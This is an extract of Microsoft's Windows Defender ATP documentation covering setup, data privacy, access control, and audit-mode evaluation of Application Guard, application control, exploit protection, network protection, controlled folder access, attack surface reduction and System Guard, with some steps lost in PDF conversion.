This option can be changed at a later time.
4. You will receive a warning notifying you that you won't be able to change some of your preferences once
you click Continue.
NOTE
Some of these options can be changed at a later time in Windows Defender Security Center.
5. A dedicated cloud instance of Windows Defender Security Center is being created at this time. This step will
take an average of 5 minutes to complete.
6. You are almost done. Before you can start using Windows Defender ATP you'll need to:
Run detection test (optional)
IMPORTANT
If you click Start using Windows Defender ATP before onboarding machines you will receive the following
notification:
7. After onboarding machines you can click Start using Windows Defender ATP. You will now launch
Windows Defender ATP for the first time.
Related topics
Onboard machines to the Windows Defender Advanced Threat Protection service
Troubleshoot onboarding process and portal access issues
Windows Defender ATP preview features
Applies to:
The Windows Defender ATP service is constantly being updated to include new feature enhancements and
capabilities.
Learn about new features in the Windows Defender ATP preview release and be among the first to try upcoming
features by turning on the preview experience.
For more information on capabilities that are generally available or in preview, see What's new in Windows
Defender. )
Turn on preview features

You'll have access to upcoming features which you can provide feedback on to help improve the overall experience
before features are generally available.
Turn on the preview experience setting to be among the first to try upcoming features.
1. In the navigation pane, select Settings > Advanced features > Preview features.

Windows Defender ATP data storage and privacy
Applies to:
This section covers some of the most frequently asked questions regarding privacy and data handling for
NOTE
This document explains the data storage and privacy details related to Windows Defender ATP. For more information related
to Windows Defender ATP and other products and services like Windows Defender Antivirus and Windows 10, see Microsoft
Privacy Statement. See also Windows 10 privacy FAQ for more information.
What data does Windows Defender ATP collect?

Windows Defender ATP will collect and store information from your configured machines in a customer dedicated
and segregated tenant specific to the service for administration, tracking, and reporting purposes.
Information collected includes file data (such as file names, sizes, and hashes), process data (running processes,
hashes), registry data, network connection data (host IPs and ports), and machine details (such as machine
identifiers, names, and the operating system version).
Microsoft stores this data securely in Microsoft Azure and maintains it in accordance with Microsoft privacy
practices and Microsoft Trust Center policies.
This data enables Windows Defender ATP to:
Proactively identify indicators of attack (IOAs) in your organization
Generate alerts if a possible attack was detected
Provide your security operations with a view into machines, files, and URLs related to threat signals from your
network, enabling you to investigate and explore the presence of security threats on the network.
Microsoft does not use your data for advertising.
Data protection and encryption

The Windows Defender ATP service utilizes state of the art data protection technologies which are based on
Microsoft Azure infrastructure.
There are various aspects relevant to data protection that our service takes care of. Encryption is one of the most
critical and it includes data encryption at rest, encryption in flight, and key management with Key Vault. For more
information on other technologies used by the Windows Defender ATP service, see Azure encryption overview .
In all scenarios, data is encrypted using 256-bit AES encyption at the minimum.
Do I have the flexibility to select where to store my data?

When onboarding the service for the first time, you can choose to store your data in Microsoft Azure datacenters
in the European Union, the United Kingdom, or the United States, or dedicated Azure Government data centers
(soon to be in preview ). Once configured, you cannot change the location where your data is stored. This provides
a convenient way to minimize compliance risk by actively selecting the geographic locations where your data will
reside. Customer data in pseudonymized form may also be stored in the central storage and processing systems in
the United States.
Is my data isolated from other customer data?

Yes, your data is isolated through access authentication and logical segregation based on customer identifier. Each
customer can only access data collected from its own organization and generic data that Microsoft provides.
How does Microsoft prevent malicious insider activities and abuse of

high privilege roles?
Microsoft developers and administrators have, by design, been given sufficient privileges to carry out their
assigned duties to operate and evolve the service. Microsoft deploys combinations of preventive, detective, and
reactive controls including the following mechanisms to help protect against unauthorized developer and/or
administrative activity:
Tight access control to sensitive data
Combinations of controls that greatly enhance independent detection of malicious activity
Multiple levels of monitoring, logging, and reporting
Additionally, Microsoft conducts background verification checks of certain operations personnel, and limits access
to applications, systems, and network infrastructure in proportion to the level of background verification.
Operations personnel follow a formal process when they are required to access a customer’s account or related
information in the performance of their duties.
Access to data for services deployed in Microsoft Azure Government data centers is only granted to operating
personnel who have been screened and approved to handle data that is subject to certain government regulations
and requirements, such as FedRAMP, NIST 800.171 (DIB ), ITAR, IRS 1075, DoD L4, and CJIS.
Is data shared with other customers?

No. Customer data is isolated from other customers and is not shared. However, insights on the data resulting
from Microsoft processing, and which don’t contain any customer specific data, might be shared with other
customers. Each customer can only access data collected from its own organization and generic data that
Microsoft provides.
How long will Microsoft store my data? What is Microsoft’s data

retention policy?
At service onboarding
You can choose the data retention policy for your data. This determines how long Window Defender ATP will store
your data. There’s a flexibility of choosing in the range of 1 month to six months to meet your company’s
regulatory compliance needs.
At contract termination or expiration
Your data will be kept and will be available to you while the licence is under grace period or suspended mode. At
the end of this period, that data will be erased from Microsoft’s systems to make it unrecoverable, no later than
180 days from contract termination or expiration.
Can Microsoft help us maintain regulatory compliance?

Microsoft provides customers with detailed information about Microsoft's security and compliance programs,
including audit reports and compliance packages, to help customers assess Windows Defender ATP services
against their own legal and regulatory requirements. Windows Defender ATP is ISO 27001 certified and has a
roadmap for obtaining national, regional and industry-specific certifications.
Windows Defender ATP for Government (soon to be in preview ) is currently undergoing audit for achieving
FedRAMP High accreditation as well as Provisional Authorization (PA) at Impact Levels 4 and 5.
By providing customers with compliant, independently-verified services, Microsoft makes it easier for customers
to achieve compliance for the infrastructure and applications they run.
For more information on the Windows Defender ATP ISO certification reports, see Microsoft Trust Center.

Assign user access to Windows Defender Security
Center
Applies to:
Azure Active Directory
Office 365
Windows Defender ATP supports two ways to manage permissions:

Basic permissions management: Set permissions to either full access or read-only.
Role-based access control (RBAC ): Set granular permissions by defining roles, assigning Azure AD user
groups to the roles, and granting the user groups access to machine groups. For more information on RBAC,
see Manage portal access using role-based access control.
NOTE
If you have already assigned basic permissions, you may switch to RBAC anytime. Consider the following before making the
switch:
Users with full access (users that are assigned the Global Administrator or Security Administrator directory role in Azure
AD), are automatically assigned the default Windows Defender ATP administrator role, which also has full access.
Additional Azure AD user groups can be assigned to the Windows Defender ATP administrator role after switching to
RBAC. Only users assigned to the Windows Defender ATP administrator role can manage permissions using RBAC.
Users that have read-only access (Security Readers) will lose access to the portal until they are assigned a role. Note that
only Azure AD user groups can be assigned a role under RBAC.
After switching to RBAC, you will not be able to switch back to using basic permissions management.
Related topic
Windows Defender Advanced Threat Protection (Windows Defender ATP ) is a unified platform for preventative
protection, post-breach detection, automated investigation, and response.
You can evaluate Windows Defender Advanced Threat Protection in your organization by starting your free trial.
You can also evaluate the different security capabilities in Windows Defender ATP by using the following
instructions.

These capabilities help prevent attacks and exploitations from infecting your organization.
Evaluate network protection
Evaluate controlled folder access
Evaluate application guard
Evaluate network firewall
Evaluate next generation protection

Next gen protections help detect and block the latest threats.
Evaluate antivirus
See Also
Get started with Windows Defender Advanced Threat Protection
Application Guard testing scenarios
We've come up with a list of scenarios that you can use to test hardware-based isolation in your organization.
Application Guard in standalone mode

You can see how an employee would use standalone mode with Application Guard.
To test Application Guard in Standalone mode
1. Install Application Guard.
2. Restart the device, start Microsoft Edge, and then click New Application Guard window from the menu.
3. Wait for Application Guard to set up the isolated environment.
NOTE
Starting Application Guard too quickly after restarting the device might cause it to take a bit longer to load.
However, subsequent starts should occur without any perceivable delays.
4. Go to an untrusted, but safe URL (for this example, we used msn.com) and view the new Microsoft Edge
window, making sure you see the Application Guard visual cues.
Application Guard in Enterprise-managed mode
How to install, set up, turn on, and configure Application Guard for Enterprise-managed mode.
Install, set up, and turn on Application Guard
Before you can use Application Guard in enterprise mode, you must install Windows 10 Enterprise edition, version
1709, which includes the functionality. Then, you must use Group Policy to set up the required settings.
1. Install Application Guard.
2. Restart the device and then start Microsoft Edge.
3. Set up the Network Isolation settings in Group Policy:
a. Click on the Windows icon, type Group Policy, and then click Edit Group Policy.
b. Go to the Administrative Templates\Network\Network Isolation\Enterprise resource domains
hosted in the cloud setting.
c. For the purposes of this scenario, type .microsoft.com into the Enterprise cloud resources box.
d. Go to the Administrative Templates\Network\Network Isolation\Domains categorized as both
work and personal setting.
e. For the purposes of this scenario, type bing.com into the Neutral resources box.
4. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Turn on Windows Defender Application Guard in Enterprise Mode
setting.
5. Click Enabled, choose Option 1, and click OK.
NOTE
Enabling this setting verifies that all the necessary settings are properly configured on your employee devices,
including the network isolation settings set earlier in this scenario.
6. Start Microsoft Edge and type www.microsoft.com.

After you submit the URL, Application Guard determines the URL is trusted because it uses the domain
you’ve marked as trusted and shows the site directly on the host PC instead of in Application Guard.
7. In the same Microsoft Edge browser, type any URL that isn’t part of your trusted or neutral site lists.
After you submit the URL, Application Guard determines the URL is untrusted and redirects the request to
the hardware-isolated environment.
Customize Application Guard

Application Guard lets you specify your configuration, allowing you to create the proper balance between
isolation-based security and productivity for your employees.
Application Guard provides the following default behavior for your employees:
No copying and pasting between the host PC and the isolated container.
No printing from the isolated container.
No data persistence from one isolated container to another isolated container.
You have the option to change each of these settings to work with your enterprise from within Group Policy.
Applies to:
Windows 10 Enterpise edition, version 1709 or higher
Windows 10 Professional edition, version 1803
Copy and paste options
Defender Application Guard\Configure Windows Defender Application Guard clipboard settings.
2. Click Enabled and click OK.
3. Choose how the clipboard works:

Copy and paste from the isolated session to the host PC
Copy and paste from the host PC to the isolated session
Copy and paste both directions
4. Choose what can be copied:
1. Only text can be copied between the host PC and the isolated container.
2. Only images can be copied between the host PC and the isolated container.
3. Both text and images can be copied between the host PC and the isolated container.
5. Click OK.
Print options
Defender Application Guard\Configure Windows Defender Application Guard print settings.
3. Based on the list provided in the setting, choose the number that best represents what type of printing
should be available to your employees. You can allow any combination of local, network, PDF, and XPS
printing.
4. Click OK.
Data persistence options
Defender Application Guard\Allow data persistence for Windows Defender Application Guard
setting.
3. Open Microsoft Edge and browse to an untrusted, but safe URL.
The website opens in the isolated session.
4. Add the site to your Favorites list and then close the isolated session.
5. Log out and back on to your device, opening Microsoft Edge in Application Guard again.
The previously added site should still appear in your Favorites list.
NOTE
If you don't allow or turn off data persistence, restarting a device or logging in and out of the isolated container
triggers a recycle event that discards all generated data, including session cookies, Favorites, and so on, removing the
data from Application Guard. If you turn on data persistence, all employee-generated artifacts are preserved across
container recycle events. However, these artifacts only exist in the isolated container and aren’t shared with the host
PC. This data persists after restarts and even through build-to-build upgrades of Windows 10.
If you turn on data persistence, but later decide to stop supporting it for your employees, you can use our Windows-
provided utility to reset the container and to discard any personal data.
To reset the container:

1. Open a command-line program and navigate to Windows/System32.
2. Type wdagtool.exe cleanup .
The container environment is reset, retaining only the employee-generated data.
3. Type wdagtool.exe cleanup RESET_PERSISTENCE_LAYER .
The container environment is reset, including discarding all employee-generated data.
Applies to:
Windows 10 Enterpise edition, version 1803
Download options
Defender Application Guard\Allow files to download and save to the host operating system from
Windows Defender Application Guard setting.
4. Download a file from Windows Defender Application Guard.
5. Check to see the file has been downloaded into This PC > Downloads > Untrusted files.
Hardware acceleration options
Defender Application Guard\Allow hardware-accelerated rendering for Windows Defender
Application Guard setting.
3. Once you have enabled this feature, open Microsoft Edge and browse to an untrusted, but safe URL with
video, 3D, or other graphics-intensive content. The website opens in an isolated session.
4. Assess the visual experience and battery performance.
Applies to:
Windows 10 Enterpise edition, version 1809
File trust options
Defender Application Guard\Allow users to trust files that open in Windows Defender
2. Click Enabled, set Options to 2, and click OK.
4. Open a file in Edge, such an Office 365 file.
5. Check to see that an antivirus scan completed before the file was opened.
Camera and microphone options
Defender Application Guard\Allow camera and microphone access in Windows Defender
4. Open an application with video or audio capability in Edge.
5. Check that the camera and microphone work as expected.
Root certificate sharing options
Defender Application Guard\Allow Windows Defender Application Guard to use Root Certificate
Authorities from the user's device setting.
2. Click Enabled, copy the thumbprint of each certificate to share, separated by a comma, and click OK.
Audit Windows Defender Application Control policies
Applies to:
Windows 10
Windows Server 2016
Running Appication Control in audit mode allows administrators to discover any applications that were missed
during an initial policy scan and to identify any new applications that have been installed and run since the original
policy was created. While a WDAC policy is running in audit mode, any binary that runs and would have been
denied had the policy been enforced is logged in the Applications and Services
Logs\Microsoft\Windows\CodeIntegrity\Operational event log. When these logged binaries have been
validated, they can easily be added to a new WDAC policy. When the new exception policy is created, you can
merge it with your existing WDAC policies.
Before you begin this process, you need to create a WDAC policy binary file. If you have not already done so, see
Create an initial Windows Defender Application Control policy from a reference computer.
To audit a Windows Defender Application Control policy with local policy:
1. Before you begin, find the *.bin policy file , for example, the DeviceGuardPolicy.bin. Copy the file to
C:\Windows\System32\CodeIntegrity.
2. On the computer you want to run in audit mode, open the Local Group Policy Editor by running
GPEdit.msc.
NOTE
The computer that you will run in audit mode must be clean of viruses or malware. Otherwise, in the process
that you follow after auditing the system, you might unintentionally merge in a policy that allows viruses or
malware to run.
An alternative method to test a policy is to rename the test file to SIPolicy.p7b and drop it into
C:\Windows\System32\CodeIntegrity, rather than deploy it by using the Local Group Policy Editor.
3. Navigate to Computer Configuration\Administrative Templates\System\Windows Defender

Device Guard, and then select Deploy Windows Defender Application Control. Enable this setting by
using the appropriate file path, for example, C:\Windows\System32\CodeIntegrity\DeviceGuardPolicy.bin,
as shown in Figure 1.
NOTE
You can copy the WDAC policies to a file share to which all computer accounts have access rather than copy
them to every system.
You might have noticed that the GPO setting references a .p7b file and this policy uses a .bin file. Regardless of
the type of policy you deploy (.bin, .p7b, or .p7), they are all converted to SIPolicy.p7b when dropped onto the
computers running Windows 10. We recommend that you make your WDAC policy names friendly and allow
the system to convert the policy names for you. By doing this, it ensures that the policies are easily
distinguishable when viewed in a share or any other central repository.
Figure 1. Deploy your Windows Defender Application Control policy
4. Restart the reference system for the WDAC policy to take effect.
5. Use the system as you normally would, and monitor code integrity events in the event log. While in audit
mode, any exception to the deployed WDAC policy will be logged in the Applications and Services
Logs\Microsoft\Windows\CodeIntegrity\Operational event log, as shown in Figure 2.
Figure 2. Exceptions to the deployed WDAC policy
You will be reviewing the exceptions that appear in the event log, and making a list of any applications that
should be allowed to run in your environment.
6. If you want to create a catalog file to simplify the process of including unsigned LOB applications in your
WDAC policy, this is a good time to create it. For information, see Deploy catalog files to support Windows
Defender Application Control.
Now that you have a WDAC policy deployed in audit mode, you can capture any audit information that appears in
the event log. This is described in the next section.
Create a Windows Defender Application Control policy that captures

audit information from the event log
Use the following procedure after you have been running a computer with a WDAC policy in audit mode for a
period of time. When you are ready to capture the needed policy information from the event log (so that you can
later merge that information into the original WDAC policy), complete the following steps.
1. Review the audit information in the event log. From the WDAC policy exceptions that you see, make a list of
any applications that should be allowed to run in your environment, and decide on the file rule level that
should be used to trust these applications.
Although the Hash file rule level will catch all of these exceptions, it may not be the best way to trust all of
them. For information about file rule levels, see Windows Defender Application Control file rule levels in
"Deploy Windows Defender Application Control: policy rules and file rules."
Your event log might also contain exceptions for applications that you eventually want your WDAC policy to
block. If these appear, make a list of these also, for a later step in this procedure.
2. In an elevated Windows PowerShell session, initialize the variables that will be used. The example filename
shown here is DeviceGuardAuditPolicy.xml:
$CIPolicyPath=$env:userprofile+"\Desktop\"
$CIAuditPolicy=$CIPolicyPath+"DeviceGuardAuditPolicy.xml"
3. Use New -CIPolicy to generate a new WDAC policy from logged audit events. This example uses a file rule
level of Hash and includes 3> CIPolicylog.txt , which redirects warning messages to a text file,
CIPolicylog.txt.
New-CIPolicy -Audit -Level Hash -FilePath $CIAuditPolicy –UserPEs 3> CIPolicylog.txt
NOTE
When you create policies from audit events, you should carefully consider the file rule level that you select to trust.
The preceding example uses the Hash rule level, which is the most specific. Any change to the file (such as replacing
the file with a newer version of the same file) will change the Hash value, and require an update to the policy.
4. Find and review the WDAC audit policy .xml file that you created. If you used the example variables as
shown, the filename will be DeviceGuardAuditPolicy.xml, and it will be on your desktop. Look for the
following:
Any applications that were caught as exceptions, but should be allowed to run in your environment.
These are applications that should be in the .xml file. Leave these as-is in the file.
Any applications that actually should not be allowed to run in your environment. Edit these out of the
.xml file. If they remain in the .xml file, and the information in the file is merged into your existing
WDAC policy, the policy will treat the applications as trusted, and allow them to run.
You can now use this file to update the existing WDAC policy that you ran in audit mode by merging the two
policies. For instructions on how to merge this audit policy with the existing WDAC policy, see the next section,
Merge Windows Defender Application Control policies.
NOTE
You may have noticed that you did not generate a binary version of this policy as you did in Create a Windows Defender
Application Control policy from a reference computer. This is because WDAC policies created from an audit log are not
intended to run as stand-alone policies but rather to update existing WDAC policies.
Applies to:
Exploit protection helps protect devices from malware that uses exploits to spread and infect other devices. It
consists of a number of mitigations that can be applied to either the operating system or an individual app. Many
of the features that were part of the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit
protection.
This topic helps you enable exploit protection in audit mode and review related events in Event Viewer. You can
enable audit mode for certain app-level mitigations to see how they will work in a test environment. This lets you
see a record of what would have happened if you had enabled the mitigation in production. You can make sure it
doesn't affect your line-of-business apps, and see which suspicious or malicious events occur.
TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to see how exploit protection
works.
Enable exploit protection in audit mode

You can set mitigations in audit mode for specific programs either by using the Windows Security app or
PowerShell.
Windows Security app
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the App & browser control tile (or the app icon on the left menu bar) and then click Exploit
protection.
3. Go to Program settings and choose the app you want to apply mitigations to:
a. If the app you want to configure is already listed, click it and then click Edit
b. If the app is not listed, at the top of the list click Add program to customize and then choose how you
want to add the app:
Use Add by program name to have the mitigation applied to any running process with that
name. You must specify a file with an extension. You can enter a full path to limit the mitigation to
only the app with that name in that location.
Use Choose exact file path to use a standard Windows Explorer file picker window to find and
select the file you want.
4. After selecting the app, you'll see a list of all the mitigations that can be applied. Choosing Audit will apply
the mitigation in audit mode only. You will be notified if you need to restart the process or app, or if you
need to restart Windows.
5. Repeat this for all the apps and mitigations you want to configure. Click Apply when you're done setting
up your configuration.
PowerShell
To set app-level mitigations to audit mode, use Set-ProcessMitigation with the Audit mode cmdlet.
Configure each mitigation in the following format:
Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,

<mitigation or options>
Where:
<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify the app's executable after
this flag.
<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation
<Mitigation>:
The mitigation's cmdlet as defined in the following table. Each mitigation is separated with a comma.
MITIGATION AUDIT MODE CMDLET
Arbitrary code guard (ACG) AuditDynamicCode
Block low integrity images AuditImageLoad
Block untrusted fonts AuditFont, FontAuditOnly
Code integrity guard AuditMicrosoftSigned, AuditStoreSigned
Disable Win32k system calls AuditSystemCall
Do not allow child processes AuditChildProcess
For example, to enable Arbitrary Code Guard (ACG ) in audit mode for an app named testing.exe, run the
following command:
Set-ProcesMitigation -Name c:\apps\lob\tests\testing.exe -Enable AuditDynamicCode
You can disable audit mode by replacing -Enable with -Disable .
Review exploit protection audit events

To review which apps would have been blocked, open Event Viewer and filter for the following events in the
Security-Mitigations log.
FEATURE PROVIDER/SOURCE EVENT ID DESCRIPTION
Exploit protection Security-Mitigations (Kernel 1 ACG audit

Mode/User Mode)
Exploit protection Security-Mitigations (Kernel 3 Do not allow child processes

Mode/User Mode) audit
FEATURE PROVIDER/SOURCE EVENT ID DESCRIPTION
Exploit protection Security-Mitigations (Kernel 5 Block low integrity images

Exploit protection Security-Mitigations (Kernel 7 Block remote images audit

Mode/User Mode)
Exploit protection Security-Mitigations (Kernel 9 Disable win32k system calls

Exploit protection Security-Mitigations (Kernel 11 Code integrity guard audit

Mode/User Mode)
Related topics
Comparison with Enhanced Mitigation Experience Toolkit
Troubleshoot exploit protection
Enable network protection
Enable controlled folder access
Enable attack surface reduction
Applies to:
Network protection helps prevent employees from using any application to access dangerous domains that may
host phishing scams, exploits, and other malicious content on the Internet.
This topic helps you evaluate Network protection by enabling the feature and guiding you to a testing site. The site
in this evaluation topic are not malicious, they are specially created websites that pretend to be malicious. The site
will replicate the behavior that would happen if a user visted a malicious site or domain.
TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to see how other protection
features work.
Enable network protection in audit mode

You can enable network protection in audit mode to see which IP addresses and domains would have been
blocked if it was enabled.
You might want to do this to make sure it doesn't affect line-of-business apps or to get an idea of how often blocks
occur.
1. Type powershell in the Start menu, right click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:
Set-MpPreference -EnableNetworkProtection AuditMode
Visit a (fake ) malicious domain

1. Open Internet Explorer, Google Chrome, or any other browser of your choice.
2. Go to https://smartscreentestratings2.net.
The network connection will be allowed and a test message will be displayed.
Review network protection events in Windows Event Viewer
To review apps that would have been blocked, open Event Viewer and filter for Event ID 1125 in the Microsoft-
Windows-Windows-Defender/Operational log. The following table lists all network protection events.
EVENT ID PROVIDE/SOURCE DESCRIPTION
5007 Windows Defender (Operational) Event when settings are changed
1125 Windows Defender (Operational) Event when a network connection is

audited
1126 Windows Defender (Operational) Event when a network connection is

blocked
Related topics
Network protection
Troubleshoot network protection
Evaluate controlled folder access
Applies to:
Controlled folder access is a feature that helps protect your documents and files from modification by suspicious
or malicious apps. Controlled folder access is supported on Windows Server 2019 as well as Windows 10 clients.
It is especially useful in helping to protect your documents and information from ransomware that can attempt to
encrypt your files and hold them hostage.
This topic helps you evaluate controlled folder access. It explains how to enable audit mode so you can test the
feature directly in your organization.
TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working
and see how it works.
Use audit mode to measure impact

You can enable the controlled folder access feature in audit mode. This lets you see a record of what would have
happened if you had enabled the setting.
You might want to do this when testing how the feature will work in your organization, to ensure it doesn't affect
your line-of-business apps, and to get an idea of how many suspicious file modification attempts generally occur
over a certain period.
To enable audit mode, use the following PowerShell cmdlet:
Set-MpPreference -EnableControlledFolderAccess AuditMode
TIP
If you want to fully audit how controlled folder access will work in your organization, you'll need to use a management tool
to deploy this setting to machines in your network(s). You can also use Group Policy, Intune, MDM, or System Center
Configuration Manager to configure and deploy the setting, as described in the main controlled folder access topic.
Review controlled folder access events in Windows Event Viewer

The following controlled folder access events appear in Windows Event Viewer.
1124 Audited controlled folder access event

1123 Blocked controlled folder access event
Customize protected folders and apps

During your evaluation, you may wish to add to the list of protected folders, or allow certain apps to modify files.
See Protect important folders with controlled folder access for configuring the feature with management tools,
including Group Policy, PowerShell, and MDM CSP.
Related topics
Protect important folders with controlled folder access
Use audit mode
Applies to:
Attack surface reduction rules help prevent actions and apps that are typically used by exploit-seeking malware to
infect machines. Attack surface reduction rules are supported on Windows Server 2019 as well as Windows 10
clients.
This topic helps you evaluate attack surface reduction rules. It explains how to enable audit mode so you can test
the feature directly in your organization.
TIP
Use audit mode to measure impact

You can enable attack surface reduction rules in audit mode. This lets you see a record of what apps would have
been blocked if you had enabled attack surface reduction rules.
You might want to do this when testing how the feature will work in your organization, to ensure it doesn't affect
your line-of-business apps, and to get an idea of how often the rules will fire during normal use.
To enable audit mode, use the following PowerShell cmdlet:
Set-MpPreference -AttackSurfaceReductionRules_Actions AuditMode
This enables all attack surface reduction rules in audit mode.
TIP
If you want to fully audit how attack surface reduction rules will work in your organization, you'll need to use a management
tool to deploy this setting to machines in your network(s). You can also use Group Policy, Intune, or MDM CSPs to
configure and deploy the setting, as described in the main Attack surface reduction rules topic.
Review attack surface reduction events in Windows Event Viewer

To review apps that would have been blocked, open Event Viewer and filter for Event ID 1121 in the Microsoft-
Windows-Windows-Defender/Operational log. The following table lists all network protection events.
1121 Event when an attack surface reduction rule fires in block

mode
1122 Event when an attack surface reduction rule fires in audit

mode
Customize attack surface reduction rules

During your evaluation, you may wish to configure each rule individualy or exclude certain files and processes
from being evaluated by the feature.
See the Customize attack surface reduction rules topic for information on configuring the feature with
management tools, including Group Policy and MDM CSP policies.
Related topics
Reduce attack surfaces with attack surface reduction rules
Evaluate Windows Defender Exploit Guard
Use audit mode to evaluate Windows Defender Exploit Guard
Evaluating Windows Defender Firewall with
Advanced Security Design Examples
Applies to
Windows 10
Windows Server 2016
The following Windows Defender Firewall with Advanced Security design examples illustrate how you can use
Windows Defender Firewall to improve the security of the devices connected to the network. You can use these
topics to evaluate how the firewall and connection security rules work across all Windows Defender Firewall
designs and to determine which design or combination of designs best suits the goals of your organization.
Firewall Policy with Advanced Security Design Example
Domain Isolation Policy Design Example
Server Isolation Policy Design Example
Certificate-based Isolation Policy Design Example
Evaluate Windows Defender Antivirus
Applies to:
Use this guide to determine how well Windows Defender Antivirus protects you from viruses, malware, and
potentially unwanted applications.
TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the following features are
working and see how they work:
It explains the important next generation protection features of Windows Defender Antivirus available for both
small and large enterprises, and how they increase malware detection and protection across your network.
You can choose to configure and evaluate each setting independently, or all at once. We have grouped similar
settings based upon typical evaluation scenarios, and include instructions for using PowerShell to enable the
settings.
The guide is available in PDF format for offline viewing:
Download the guide in PDF format
You can also download a PowerShell that will enable all the settings described in the guide automatically. You can
obtain the script alongside the PDF download above, or individually from PowerShell Gallery:
Download the PowerShell script to automatically configure the settings
IMPORTANT
The guide is currently intended for single-machine evaluation of Windows Defender Antivirus. Enabling all of the settings in
this guide may not be suitable for real-world deployment.
For the latest recommendations for real-world deployment and monitoring of Windows Defender Antivirus across a
network, see Deploy Windows Defender Antivirus.
Related topics
Windows Defender Antivirus in Windows 10
Deploy Windows Defender Antivirus
Access the Windows Defender ATP Community
Center
Applies to:
The Windows Defender ATP Community Center is a place where community members can learn, collaborate, and
share experiences about the product.
There are several spaces you can explore to learn about specific information:
Announcements
What's new
Threat Intelligence
There are several ways you can access the Community Center:
In the Windows Defender Security Center navigation pane, select Community center. A new browser tab
opens and takes you to the Windows Defender ATP Tech Community page.
Access the community through the Windows Defender Advanced Threat Protection Tech Community page
You can instantly view and read conversations that have been posted in the community.
To get the full experience within the community such as being able to comment on posts, you'll need to join the
community. For more information on how to get started in the Microsoft Tech Community, see Microsoft Tech
Community: Getting Started.
Configure and manage Windows Defender ATP
capabilities
Applies to:
Configure and manage all the Windows Defender ATP capabilities to get the best security protection for your
organization.
In this section
TOPIC DESCRIPTION
Configure attack surface reduction capabilities By ensuring configuration settings are properly set and exploit
mitigation techniques are applied, these set of capabilities
resist attacks and exploitations.
Configure next generation protection Configure next generation protection to catch all types of
emerging threats.
Configure Secure score dashboard security controls Configure the security controls in Secure score to increase the
security posture of your organization.
Configure Microsoft Threat Experts capabilities Configure and manage how you would like to get
cybersecurity threat intelligence from Microsoft Threat Experts.
Configure Microsoft Threat Protection integration Configure other solutions that integrate with Windows
Defender ATP.
Management and API support Pull alerts to your SIEM or use APIs to create custom alerts.
Create and build Power BI reports.
Configure Windows Defender Security Center settings Configure portal related settings such as general settings,
advanced features, enable the preview experience and others.
Configure attack surface reduction
You can configure attack surface reduction with a number of tools, including:
Microsoft Intune
Group Policy
PowerShell cmdlets
The topics in this section describe how to configure attack surface reduction. Each topic includes instructions for
the applicable configuration tool (or tools).
In this section
TOPIC DESCRIPTION
Enable hardware-based isolation for Microsoft Edge How to preprare for and install Application Guard, including
hardware and softeware requirements
Enable application control How to control applications run by users and potect kernel
mode processes
Exploit protection How to automatically apply exploit mitigation techniques on

both operating system processes and on individual apps
Network protection How to prevent users from using any apps to acces
dangerous domains
Controlled folder access How to protect valuable data from malicious apps
Attack surface reduction How to prevent actions and apps that are typically used for by
exploit-seeking malware
Network firewall How to protect devices and data across a network

System Guard Secure Launch and SMM protection
This topic explains how to configure System Guard Secure Launch and System Management Mode (SMM )
protection to improve the startup security of Windows 10 devices. The information below is presented from a
client perspective.
How to enable System Guard Secure Launch

You can enable System Guard Secure Launch by using any of these options:
Mobile Device Management (MDM )
Group Policy
Windows Security Center
Registry
Mobile Device Management
System Guard Secure Launch can be configured for Mobile Device Management (MDM ) by using DeviceGuard
policies in the Policy CSP, specifically DeviceGuard/ConfigureSystemGuardLaunch.
Group Policy
1. Click Start > type and then click Edit group policy.
2. Click Computer Configuration > Administrative Templates > System > Device Guard > Turn On
Virtualization Based Security > Secure Launch Configuration.
Windows Security Center

Click Start > Settings > Update & Security > Windows Security > Open Windows Security > Device
security > Core isolation > Firmware protection.
Registry
1. Open Registry editor.
2. Click HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > DeviceGuard > Scenarios.
3. Right-click Scenarios > New > Key and name the new key SystemGuard.
4. Right-click SystemGuard > New > DWORD (32-bit) Value and name the new DWORD Enabled.
5. Double-click Enabled, change the value to 1, and click OK.
How to verify System Guard Secure Launch is configured and running
To verify that Secure Launch is running, use System Information (MSInfo32). Click Start, search for System
Information, and look under Virtualization-based Security Services Running and Virtualization-based
Security Services Configured.
NOTE
To enable System Guard Secure launch, the platform must meet all the baseline requirements for Device Guard, Credential
Guard, and Virtualization Based Security.
Requirements Met by System Guard Enabled Machines

Any machine with System Guard enabled will automatically meet the following low -level hardware requirements:
FOR INTEL® VPRO™ PROCESSORS STARTING WITH INTEL®

COFFEELAKE, WHISKEYLAKE, OR LATER SILICON DESCRIPTION
64-bit CPU A 64-bit computer with minimum 4 cores (logical processors)

is required for hypervisor and virtualization-based security
(VBS). For more info about Hyper-V, see Hyper-V on Windows
Server 2016 or Introduction to Hyper-V on Windows 10. For
more info about hypervisor, see Hypervisor Specifications.
Trusted Platform Module (TPM) 2.0 Platforms must support a discrete TPM 2.0.
Integrated/firmware TPMs are not supported.
Windows DMA Protection Platforms must meet the Windows DMA Protection
Specification (all external DMA ports must be off by default
until the OS explicitly powers them).
SMM communication buffers All SMM communication buffers must be implemented in

EfiRuntimeServicesData ,EfiRuntimeServicesCode ,
EfiACPIMemoryNVS, or EfiReservedMemoryType memory
types.
SMM Page Tables Must NOT contain any mappings to EfiConventionalMemory

(e.g. no OS/VMM owned memory).
Must NOT contain any mappings to code sections within
EfiRuntimeServicesCode.
Must NOT have execute and write permissions for the same
page
Must allow ONLY that TSEG pages can be marked executable
and the memory map must report TSEG
EfiReservedMemoryType.
BIOS SMI handler must be implemented such that SMM page
tables are locked on every SMM entry.
Modern/Connected Standby Platforms must support Modern/Connected Standby.
TPM AUX Index Platform must set up a AUX index with index, attributes, and
policy that exactly corresponds to the AUX index specified in
the TXT DG with a data size of exactly 104 bytes (for SHA256
AUX data). (NameAlg = SHA256)
Platforms must set up a PS (Platform Supplier) index with:
